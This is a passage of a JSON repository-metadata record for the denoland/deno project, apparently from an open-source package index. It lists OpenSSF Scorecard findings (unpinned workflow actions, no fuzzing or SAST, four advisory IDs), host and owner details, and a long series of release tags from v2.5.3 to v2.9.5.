.github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02: